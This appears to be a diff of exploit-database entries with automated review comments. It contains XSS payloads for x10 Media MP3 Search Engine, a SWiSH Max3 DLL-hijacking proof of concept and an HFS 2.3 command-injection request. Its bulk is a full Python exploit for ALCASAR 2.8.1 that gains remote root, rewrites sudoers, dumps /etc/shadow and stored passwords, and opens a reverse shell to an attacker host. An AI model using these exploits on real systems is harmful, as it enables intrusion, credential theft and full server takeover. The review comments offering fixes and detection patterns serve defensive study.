x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/templates/header1.php?id=[XSS]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/video_listing.php?category=[NB]&sort=[NB]&key=[XSS]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/embed.php?name="><script>alert(document.cookie);</script>

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/info.php?name="><script>alert(document.cookie);</script>
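Review bot: this entry is identical to the embed.php one apart from the script name and the same "name" parameter; if info.php and embed.php share a template or include that does the echoing, say so, because then there is one sink to fix rather than two, and the advisory should list the shared file instead.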


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/lyrics.php?id="><script>alert(document.cookie);</script>
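Review bot: "id" on lyrics.php reads as a record identifier, which makes this the easiest of the set to close: validate it as an integer (ctype_digit() or an (int) cast) before use and encode on output. The entry should also state whether the same "id" reaches a database query, since that would change the severity; as written it only documents the reflected case.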


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/adult/video_listing.php?category=42&sort=2&key="><script>alert(document.cookie);</script>
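Review bot: this is the same "key" parameter on video_listing.php already reported earlier in this commit, differing only in the "/adult/" path prefix and in using concrete values (category=42&sort=2) where the earlier entry used "[NB]". Either consolidate the two entries or note explicitly that the adult section is a separate copy of the script that needs its own fix; as it stands a maintainer could patch one copy and believe both reports are closed.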

platforms/php/webapps/34666.py Executable file

@ -0,0 +1,229 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
####
#
# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability
#
# Author: eF
# Date : 2014-09-12
# URL : http://www.alcasar.net/
#
# This is not a responsible disclosure coz' I have no sense of ethics and I don't give a f*ck.
#
# db 88 ,ad8888ba, db ad88888ba db 88888888ba
# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b
# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P
# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P'
# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88'
# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b
# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b
# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b
#
#
# ALCASAR is a free Network Access Controller which controls the Internet consultation networks.
# It authenticates, attributes and protects users' access regardless their connected equipment
# (PC, smartphone, game console, etc.).
#
# I recently released an exploit for ALCASAR 2.8 (ALCASAR <= 2.8 Remote Code Execution Vulnerability Root).
# As a reminder, it was a trivial code execution via a unfiltered exec() call:
#
# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
#
# A few days later, a new version corrects the vulnerability. Or maybe not...
#
# At first, this is how ALCASAR's developers present the previous vulnerability:
#
# " A security hole has been discovered on ALCASAR V2.8 (only this version). This vulnerability allows a user "
# " connected on the LAN to retrieve a lot of data from the server. The ALCASAR team is testing few security "
# " patches. A script that you could run on the active servers will be available on this forum ASAP. At that "
# " time, the download version of ALCASAR will be incremented (V2.8.1) "
#
# ?!? This vulnerability allows a user connected on the LAN to *TOTALLY PWN* the server:
# Get a root shell, stop all services, sniff all connections, inject data in users' sessions, sniff passwords,
# bypass firewall rules, act as another user, etc.
# This is not just a matter of "retrieving a lot of data from the server".
#
# Not to alert users of real criticality of a vulnerability is a very serious lack of security.
# Lying by saying that the vulnerability only affects version 2.8 while it also affects version 2.7 is another
# one.
#
# Now, the patch itself: it tries to correct the vulnerability by filtering the vulnerable input:
#
# $pattern = filter_var($pattern, FILTER_VALIDATE_URL) == false ? "" : $pattern;
#
# WTF?!
# First, I think that the application no longer works. By default, filter_var() is going to accept an URL
# only if its scheme is valid:
#
# $ php -r 'var_dump(filter_var("www.google.com", FILTER_VALIDATE_URL));'
# bool(false)
# $ php -r 'var_dump(filter_var("http://www.google.com", FILTER_VALIDATE_URL));'
# string(21) "http://www.google.com"
#
# But... we cannot put http:// in the HTTP host field, the HTTP server won't let us...
# Dev, did you try your patch?
# Instead, to execute code, it's quite easy to bypass this filtering using "mailto:email@valid.tld;cmd;"
# Service down, vulnerability still present: double fail.
#
# The privilege escalation in the previous exploit was using openssl, to gain reading and writing rights
# as root.
#
# The patch therefore removes openssl in the sudoers file (without changing the legitimate
# calls in the PHP code...). So let's use another method: systemctl is still callable via sudo...
#
# We can create a service with our command and start it as root:
#
# sudo systemctl link /tmp/pwn3d.service
# sudo systemctl start pwn3d.service
#
# Conclusion: triple fail.
#
# Wouldn't a "responsable de la sécurité des systèmes d'information d'un grand commandement" need a
# little training on secure PHP development?
#
# On ALCASAR website:
#
# "The security of the portal has been worked out like a bastion in order to resist to different
# kinds of threat"
#
# LOLZ!!! Remote Root Code Execution does not seem to be part of these "different kinds of threat".
#
# ALCASAR is not built with security in mind. Apache user can sudo, there is no chroot, no separation,
# the PHP code is dreadful, some passwords are unnecessarily stored in plaintext, the function to
# generate user password is weak, there are no system updates (kernel is out to date, from Jul 4 2013),
# etc.
#
# Development is not really open either: there is no bugtracker, no trac, no way to see what has been
# patched, etc. If the elementary rules of open source development had been met, a user could have
# prevented this 2.8.1 patch from being crap.
#
#
####
import sys, os, re, httplib
class PWN_Alcasar:
def __init__(self, host):
self.host = host
self.root = False
def exec_cmd(self, cmd, output=False):
tag = os.urandom(4).encode('hex')
cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
if self.root:
cmd = 'sudo %s' % cmd
wrapper = 'echo %s;echo %s|base64 -d -w0|sh|base64 -w0' % (tag, cmd.encode('base64').replace('\n',''))
wrapper = wrapper.replace(' ', '${IFS}')
headers = {
'host' : 'mailto:eF@cosmic.nato;%s;#' % wrapper
}
c = httplib.HTTPConnection(self.host)
c.request('GET', '/index.php', '', headers)
r = c.getresponse()
data = r.read()
c.close()
m = re.search(r'%s, (.*)\s</div>' % tag, data)
if m:
data = m.group(1).decode('base64')
if output:
print data
return data
return None
def read_file(self, filepath, output=True):
return self.exec_cmd('cat "%s"' % filepath, output=output)
def read_passwords(self):
self.read_file('/root/ALCASAR-passwords.txt')
self.read_file('/etc/shadow')
self.read_file('/usr/local/etc/digest/key_all')
self.read_file('/usr/local/etc/digest/key_admin')
self.read_file('/usr/local/etc/digest/key_backup')
self.read_file('/usr/local/etc/digest/key_manager')
self.read_file('/usr/local/etc/digest/key_only_admin')
self.read_file('/usr/local/etc/digest/key_only_backup')
self.read_file('/usr/local/etc/digest/key_only_manager')
alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
if alcasar_mysql:
m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
if m:
radiuspwd = m.group(1)
sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
def edit_sudoers(self):
service = '[Unit]\n'
service += 'Description=Just another ALCASAR lolcalr00t\n\n'
service += '[Service]\n'
service += 'Type=forking\n'
service += 'KillMode=process\n'
service += 'ExecStart=/bin/sh -c "sed -i s/BL,NF/BL,ALL,NF/g /etc/sudoers"\n'
self.exec_cmd('echo %s | openssl base64 -d -out /tmp/Pwn3d.service -A' % service.encode('base64').replace('\n', ''))
self.exec_cmd('sudo systemctl link /tmp/Pwn3d.service')
self.exec_cmd('sudo systemctl start Pwn3d.service')
if exploit.exec_cmd('sudo id').find('uid=0') != -1:
self.root = True
def reverse_shell(self, rip, rport='80'):
payload = 'import socket,subprocess,os;'
payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
payload += 's.connect((\'%s\',%s));' % (rip, rport)
payload += 'os.dup2(s.fileno(),0);'
payload += 'os.dup2(s.fileno(),1);'
payload += 'os.dup2(s.fileno(),2);'
payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
return self.exec_cmd('python -c "%s"' % payload)
def lolz(self):
old = 'http://www.wikipedia.org'
new = 'https://www.youtube.com/watch\?v=Q-J0f1yF75Y'
self.exec_cmd('sed -i s,%s,%s,g /var/www/html/index.php' % (old, new), True)
def usage():
print 'Usage: %s host command (ip) (port)' % sys.argv[0]
print ' "command" can be a shell command or "reverseshell"'
sys.exit(0)
if __name__ == '__main__':
print '#' * 80
print '# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability'
print '# Author: eF'
print '#' * 80
if len(sys.argv) < 3:
usage()
cmd = sys.argv[2]
if cmd == 'reverseshell':
if len(sys.argv) < 5:
print '[!] Need IP and port for the reverse shell...'
sys.exit(0)
rip = sys.argv[3]
rport = sys.argv[4]
exploit = PWN_Alcasar(sys.argv[1])
print '[-] whoami (should be apache):'
exploit.exec_cmd('id', output=True)
print '[+] On the way to the uid 0...'
exploit.edit_sudoers()
print '[-] Got root?'
exploit.exec_cmd('id', output=True)
exploit.lolz()
if exploit.root:
print '[+] Here are some passwords for you (again):'
exploit.read_passwords()
if cmd == 'reverseshell':
print '[+] You should now have a shell on %s:%s' % (rip, rport)
exploit.reverse_shell(rip, rport)
else:
print '[+] Your command Sir:'
exploit.exec_cmd(cmd, output=True)
sys.exit(1)
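Review bot: the header documents the root cause (the unescaped $_SERVER['HTTP_HOST'] passed to exec() in the two quoted PHP lines) and why the 2.8.1 filter_var(..., FILTER_VALIDATE_URL) check fails to close it, but it never states the correct remediation, which is the part a defender needs. The fix is not to validate the Host value as a URL but to stop handing it to a shell at all: do the lookup in PHP (read the blacklist domain files and compare with strict equality), or at minimum escapeshellarg() the value, and remove systemctl along with the rest of the Apache user's sudo rights, since the root step in edit_sudoers() rests entirely on "sudo systemctl link /tmp/Pwn3d.service" followed by "sudo systemctl start". Usage documentation is also incomplete: usage() advertises only a command to run, yet every invocation rewrites /etc/sudoers (the sed in the service unit changes "BL,NF" to "BL,ALL,NF"), links a unit file out of /tmp, and replaces a link in /var/www/html/index.php in lolz(); those are exactly the artifacts an incident responder should check on a portal whose access logs show Host headers beginning with "mailto:" and containing "${IFS}". Minor: edit_sudoers() reaches for the module global "exploit" instead of "self", and the script exits with status 1 on the success path.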


@ -0,0 +1,43 @@
source: http://www.securityfocus.com/bid/43332/info
SWiSH Max3 is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
SWiSH Max3 is vulnerable; other versions may also be affected.
/*
#SWiSHmax DLL Hijacking Exploit (swishmaxres.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com $ GlaDiatOr $ SILVER STAR $ Coffin Of Evil $ HoBeeZ $ Mr.Mh$TEr $ ?Own3d $ Cyber-Err0r $ Nashy $ all My Friends
#contact: D3v-PoinT@hotmail.com & C1EH@Hotmail.com
#Tested on: Windows XP sp3
#How to use : Place a .swi file and swishmaxres.dll in same folder and execute .swi file in
#swishmaxres.dll (code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
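Review bot: the PoC does not build as given: it includes "stdafx.h", a Visual Studio precompiled header that is not part of the file, and calls MessageBox with narrow string literals, which only compiles in a non-Unicode project (or as MessageBoxA); the header comment should state the build settings or the file should include <windows.h> directly. On the advisory side, the useful fact for defenders is the "How to use" line: the application picks up swishmaxres.dll from the folder of the opened .swi file, i.e. the process's current directory rather than its own install directory. The vendor fix is to load the library by full path or call SetDllDirectory("") to drop the current directory from the search order; on managed clients, SafeDllSearchMode and the CWDIllegalInDllSearch policy reduce exposure, and a swishmaxres.dll sitting beside .swi files on a share is the thing to hunt for.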


@ -0,0 +1,25 @@
Affected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
it will not handle null byte so a request to
http://localhost:80/search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injection happen.
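Review bot: the explanation stops short of the actual defect. As the entry says, reMatch() in findMacroMarker() does not handle the null byte, so the marker search and the later macro evaluation disagree about the contents of the same string: the search stops at %00 while the macro engine still sees "{.exec|cmd.}" after it. The fix is therefore to reject or strip #0 from request input before it reaches findMacroMarker(), and preferably never to evaluate macros in user-supplied search strings at all, rather than to retune the regular expression. For detection, a request whose query contains %00 immediately followed by "{." is the pattern to alert on. Also, the first two lines ("Affected software", "Version") restate the "Software Link" and "Version" fields of the standard header and can be dropped.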